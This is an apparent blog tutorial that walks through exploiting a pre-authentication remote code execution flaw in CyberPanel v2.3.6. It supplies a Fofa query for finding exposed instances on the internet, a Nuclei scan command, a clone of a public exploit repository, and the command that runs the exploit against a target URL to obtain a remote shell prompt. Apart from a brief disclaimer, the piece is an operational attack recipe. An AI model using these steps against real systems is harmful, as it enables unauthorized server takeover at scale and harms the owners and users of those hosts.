CyberPanel v2.3.6 Pre-Auth Remote Code Execution

127.0.0.1

2 min read, Oct 29, 2024

CyberPanel is a popular open-source control panel for managing web hosting servers, built on top of OpenLiteSpeed. Recently, a critical vulnerability was found in CyberPanel v2.3.6 that allows remote attackers to achieve pre-authentication remote code execution (RCE).

Disclaimer

This article is for educational purposes only. Unauthorized exploitation of vulnerabilities is illegal and unethical. Use this guide only within a safe and legal environment, or with explicit permission from the system owner.

Step 1: Identifying Vulnerable CyberPanel Instances

To find CyberPanel instances potentially vulnerable to RCE, you can use Fofa with the following query:

app="CyberPanel"

Step 2: Detect CyberPanel RCE with Nuclei

ProjectDiscovery’s Nuclei tool provides a template to detect this specific vulnerability. Run the detection template against a list of hosts (cyberpanel.txt, one URL per line) as follows:

nuclei -l cyberpanel.txt -t cyberpanel-rce.yaml

Step 3: Cloning the Exploit Repository

The exploit script for CyberPanel v2.3.6 is available on GitHub. Clone the repository to get started:

git clone https://github.com/DreyAnd/CyberPanel-RCE
cd CyberPanel-RCE

Step 4: Executing the Exploit

Run the script with the target URL. Replace https://192.168.0.120:8090/ with the IP or URL of the CyberPanel instance:

python3 cyberpanel-rce.py https://192.168.0.120:8090/

The script will prompt you for a command to execute on the server:

$> whoami

References

  1. DreyAnd’s CyberPanel v2.3.6 RCE Analysis
  2. CyberPanel RCE Exploit on GitHub
  3. ProjectDiscovery Nuclei CyberPanel RCE Template
